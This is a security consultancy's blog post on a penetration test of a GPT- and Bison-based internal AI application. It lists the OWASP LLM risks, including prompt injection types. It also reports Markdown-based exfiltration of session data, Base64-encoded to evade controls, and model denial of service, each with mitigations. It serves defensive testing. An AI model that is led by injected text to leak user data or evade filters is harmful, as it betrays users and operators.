Navigating AI Security: Insights from a Generative AI Pen Test

Generative AI represents a significant milestone in technological innovation, pushing the boundaries of what machines are capable of across various domains. These AI models, with their ability to generate everything from text and images to code, symbolize a major advancement in automation, efficiency, and the capability of machines to learn, create, and aid in decision-making. Their integration into fields such as professional services, healthcare, and entertainment highlights the transformative impact of generative AI, promising to revolutionize these sectors with unprecedented levels of intelligence and creativity. 

However, the deployment of generative AI is not without its challenges, with security risks being among the most critical concerns. The sophisticated capabilities that allow generative AI to produce human-like text and creative content also open new vulnerabilities and exploitation avenues. Addressing the security of generative AI applications is thus of utmost importance, requiring a deep understanding of these potential risks and the implementation of effective strategies to safeguard against them. This necessity underscores the complexity of generative AI systems and the imperative to prioritize their security to fully realize their potential while minimizing associated risks. 

Recognizing the importance of security in the context of generative AI, the OWASP Foundation has highlighted the top 10 security vulnerabilities specific to Large Language Models (LLMs). This framework aids in comprehending and tackling these vulnerabilities, which range from prompt injection and training data poisoning to insecure output handling. Penetration testing becomes an indispensable strategy in this scenario, offering a proactive approach to identifying and addressing security weaknesses. By simulating cyberattacks, penetration testing enables the evaluation and fortification of generative AI applications against malicious exploits, ensuring their safe and effective deployment in a rapidly evolving technological landscape.

Generative AI Security Risks

The adoption of generative AI applications is on the rise, bringing a new era of technological capabilities. However, this rapid integration has brought to light significant security risks, underscoring the necessity for a comprehensive understanding and proactive measures to safeguard these systems. 

One of the most pressing challenges is the unique vulnerabilities intrinsic to Large Language Models (LLMs). The OWASP Foundation has delineated these vulnerabilities in its top 10 security risks for LLM applications, providing a crucial blueprint for identifying and mitigating potential threats​. 

OWASP Top 10 for LLM

Prompt Injection 

This involves manipulation of a Large Language Model through crafty inputs, leading to unintended actions. It includes direct injections that overwrite system prompts and indirect ones that manipulate inputs from external sources. 

  • Direct prompt injection: using malicious prompts directly within the chatbot. 

  • Indirect prompt injection: uploading or calling malicious images, documents, or websites to the chatbot. 

  • Invisible prompt injection: using encoded Unicode characters containing malicious instructions. 

Insecure Output Handling 

Occurs when LLM outputs are accepted without proper scrutiny, potentially exposing backend systems to attacks like XSS, CSRF, SSRF, privilege escalation, or remote code execution. 

Training Data Poisoning 

Happens when the training data for LLMs is tampered with, introducing vulnerabilities or biases that can compromise security, effectiveness, or ethical behavior of the model. 

Model Denial of Service 

Attackers can cause LLMs to perform resource-heavy operations, leading to service degradation or incurring high costs, exploiting the resource-intensive nature and unpredictability of user inputs. 

Supply Chain Vulnerabilities 

The lifecycle of LLM applications can be compromised by vulnerable components or services, introducing security risks through third-party datasets, pre-trained models, and plugins. 

Sensitive Information Disclosure 

LLMs may inadvertently reveal confidential data in their responses, posing risks of unauthorized data access, privacy violations, and security breaches. 

Insecure Plugin Design 

Plugins for LLMs can have insecure inputs and insufficient access control, making them susceptible to exploitation and potentially leading to serious consequences like remote code execution. 

Excessive Agency 

When Large Language Models (LLMs) interact with other systems, giving them unrestricted control can result in unwanted operations and behaviours. Similar to web applications, it is not advisable for LLMs to regulate themselves. Instead, safeguards should be integrated directly into the APIs. 


Overdependence on LLMs without proper oversight can result in misinformation, miscommunication, legal issues, and security vulnerabilities from incorrect or inappropriate content generated by the models. 

Model Theft 

Involves unauthorised access, copying, or exfiltration of proprietary LLM models, leading to economic losses, compromised competitive advantage, and potential exposure of sensitive information. 

A digital art of two men fighting with a circuit board

Description automatically generated 

Addressing the Risks 

Mitigating these risks requires a multi-faceted approach, including robust validation processes, secure coding practices, and continuous security testing. Developers and security teams must be vigilant, employing strategies such as privilege control, input validation, and secure plugin design to protect against these vulnerabilities​. 

The penetration testing of a generative AI application, as conducted by ProCheckUp, exemplifies the critical role of security assessments in identifying and addressing these risks. By simulating potential attack scenarios, pen testers can uncover vulnerabilities that might not be evident during standard security audits, thereby enabling developers to fortify their applications against real-world threats. 

As generative AI continues to evolve, so too will the landscape of associated security risks. Staying informed and proactive in addressing these challenges is essential for the safe and secure deployment of generative AI technologies. 

Project Introduction and Penetration Testing Methodology by ProCheckUp

Recently, ProCheckUp had the opportunity to conduct a comprehensive penetration test on a generative AI application for a world-leading professional services consultancy. This project represented a significant step forward in understanding and securing generative AI technologies, particularly those integrating cutting-edge models like OpenAI's GPT 3.5 and GPT 4, along with Google's Bison models. Designed for internal use, this application sought to explore the potential of generative AI within a safe and secure environment, using base models without additional training or fine-tuning. 

The Significance of the Project 

The consultancy's initiative to subject its generative AI application to a penetration test underscores the growing recognition of security as a cornerstone in the deployment of AI technologies. Given the application's reliance on prominent AI models for internal experimentation, ensuring its security was paramount to safeguarding sensitive data and maintaining operational integrity. 

PCU's Methodology

ProCheckUp's approach to penetration testing this generative AI application was methodical and tailored to address the unique challenges posed by AI technologies. In addition to the standard testing procedures, ProCheckUp implemented context-aware testing strategies to further enhance the security evaluation. This involved simulating real-world scenarios and utilising AI-specific threat models to identify vulnerabilities that could be exploited in a practical context. 

By integrating context-aware testing, the team first tested the underlying infrastructure, the application, and API calls being made when interacting with these models. This initial phase provided crucial insights into the security posture of the entire ecosystem, laying a solid foundation for subsequent, more focused testing of the generative AI models. With this comprehensive approach, ProCheckUp was able to uncover subtle security issues that standard testing methods might overlook, offering a more detailed understanding of the application's resilience against sophisticated attacks. 

The methodology encompassed several key phases:

1. Pre-Assessment 

Initially, the team engaged in a comprehensive pre-assessment phase to understand the application's architecture, the AI models involved, and the specific functionalities intended for internal use. This phase was crucial for identifying potential areas of vulnerability and planning the penetration testing strategy.

2. Risk Analysis 

Leveraging insights from the OWASP top 10 for LLMs, the team conducted a detailed risk analysis to prioritize vulnerabilities that could potentially impact the application. This included assessing the risk of prompt injection, insecure output handling, training data poisoning, and other vulnerabilities unique to generative AI applications.  

3. Testing and Exploitation 

The core of the methodology involved simulated cyberattacks to identify vulnerabilities. This phase tested the application's resilience against various attack vectors, including those identified in the risk analysis phase. Special attention was given to exploiting the unique aspects of generative AI, such as manipulating inputs to test for prompt injection vulnerabilities.

4. Analysis and Reporting

Following the testing phase, ProCheckUp analysed the findings to compile a comprehensive report detailing the vulnerabilities discovered, their potential impact, and recommended countermeasures. This report served as a roadmap for the consultancy to enhance the security of their generative AI application.

5. Remediation and Follow-Up 

ProCheckUp also provided guidance on remediating the identified vulnerabilities, emphasizing best practices for securing generative AI applications. A follow-up assessment was proposed to ensure all vulnerabilities were addressed and to validate the effectiveness of the remediation efforts. 

Through this precise methodology, ProCheckUp not only highlighted the specific risks associated with generative AI applications but also demonstrated the importance of specialized penetration testing approaches for these advanced technologies. The insights gained from this project are invaluable for developers and security professionals alike, offering a blueprint for securing generative AI applications against an evolving landscape of cyber threats

Risks Identified and Defensive Recommendations

During the penetration test conducted by ProCheckUp on the generative AI application for a world-leading professional services consultancy, several key security risks were identified, reflecting the vulnerabilities inherent in generative AI technologies as outlined by OWASP's top 10 for LLMs. These findings underscored the necessity for targeted defensive strategies to mitigate these risks effectively. 

Data Exfiltration via Markdown 

During this engagement, a significant finding was the identification of a security vulnerability by ProCheckUp in the way the models handled Markdown text. This vulnerability was uncovered through tests aimed at extracting session data via GET requests directed to a domain under our control. It was also discovered that the extracted data could be encoded, using methods such as Base64, to sidestep any security protocols currently implemented. This encoding technique made it possible to conceal the data in transit, thereby increasing the risk of unauthorised data access. 

Defensive Recommendation 

To address this vulnerability, developers are recommended to implement rigorous input validation and sanitization processes specifically for Markdown text processing. This involves ensuring that all Markdown input is thoroughly checked for malicious content before being processed or rendered. Additionally, developers should employ encoding detection mechanisms to identify and block or properly handle encoded data, such as Base64, that is attempting to bypass security measures. 

If there is no essential business requirement for rendering Markdown text, a more straightforward and effective mitigation strategy would be to disable Markdown rendering altogether. This approach eliminates the vulnerability by removing the feature that exposes the system to potential exploits. 

Furthermore, implementing Content Security Policy (CSP) headers can further mitigate the risk of unauthorized data exfiltration by restricting the domains to which data can be sent. By taking these proactive measures, including the option to disable Markdown rendering when not needed, developers can significantly enhance the security of their applications against such vulnerabilities. 

Model Denial of Service (DoS) 

Simulated attacks conducted during the security testing phase revealed that the application was susceptible to Denial of Service (DoS) attacks. These attacks could significantly degrade the application's performance or lead to incurring excessive operational costs. The vulnerability was exposed when the AI model was overloaded with resource-intensive queries, demonstrating that attackers could exploit this weakness to disrupt service availability. By bombarding the AI with such queries, the system's resources could be monopolized, resulting in slowed response times for legitimate users or even a complete service shutdown. 

Defensive Recommendation 

To protect against Model DoS attacks, it's essential to monitor resource usage closely and implement rate limiting where necessary. This can help prevent service degradation and manage operational costs effectively. 

These recommendations are pivotal for securing generative AI applications, providing a foundation for developers to enhance the resilience of their systems against emerging cyber threats. By addressing the vulnerabilities identified through penetration testing, organisations can ensure the safe and secure deployment of generative AI technologies. 

Advice for Generative AI Application Developers

The penetration test conducted on a generative AI application has illuminated several key areas of concern but, more importantly, has offered invaluable insights into how developers can fortify their applications against potential security threats.  

Here are essential practices and considerations for developers working on generative AI applications: 

  • Prioritise security: Throughout the development lifecycle by integrating threat modelling, security testing, and code reviews early and often. 

  • Understand and address the unique vulnerabilities: Associated with generative AI technologies, as highlighted by OWASP's top 10 for LLMs. 

  • Enforce strict input validation and sanitisation: To protect against prompt injection and insecure output handling. 

  • Ensure the integrity of training data and models: To prevent poisoning and consider the security of third-party resources. 

  • Implement a zero-trust architecture: To safeguard against supply chain attacks, including regular security assessments of third-party components. 

  • Design applications to be resilient against Denial of Service (DoS) attacks: Through rate limiting and resource usage monitoring. 

  • Stay updated on cybersecurity trends, vulnerabilities, and best practices: And regularly update applications to address known issues. 

  • Conduct routine penetration testing: To identify hidden vulnerabilities and assess the effectiveness of security measures. 

  • Promote a culture of security awareness: within development teams and organizations through education, training, and awareness programs. 

By following these recommendations, developers can significantly bolster the security and resilience of generative AI applications against a dynamic landscape of cyber threats. This approach, informed by comprehensive penetration testing and expert insights, offers a strategic framework for protecting generative AI technologies. 


The penetration test conducted by ProCheckUp on generative AI applications reveals crucial security vulnerabilities, underlining the necessity of developing robust security measures tailored to these advanced technologies. Key issues such as data exfiltration, model denial-of-service and more were identified, aligning with the OWASP top 10 for LLM vulnerabilities. Recommendations for mitigating these risks include enhanced input validation, secure training data management, and the implementation of a zero-trust architecture for supply chain security, offering clear strategies for enhancing security. 

Developers are encouraged to embed security practices throughout the development lifecycle, stay updated on the latest security vulnerabilities, and foster a culture of security awareness. This proactive stance is vital for enhancing the resilience of generative AI applications against emerging cyber threats. The evolution of generative AI technologies necessitates a continuous and evolving approach to security, characterized by a commitment to adaptation and vigilance. 

The role of cybersecurity professionals, developers, and organizations in securing generative AI applications is critical as these technologies become increasingly integrated into various sectors. The insights gained from penetration tests like ProCheckUp's are invaluable, driving the secure advancement of generative AI. Emphasizing a comprehensive approach to security can ensure that the transformative potential of generative AI is realized safely and beneficially. 

Contact ProCheckUp today to explore risks in your generative AI applications.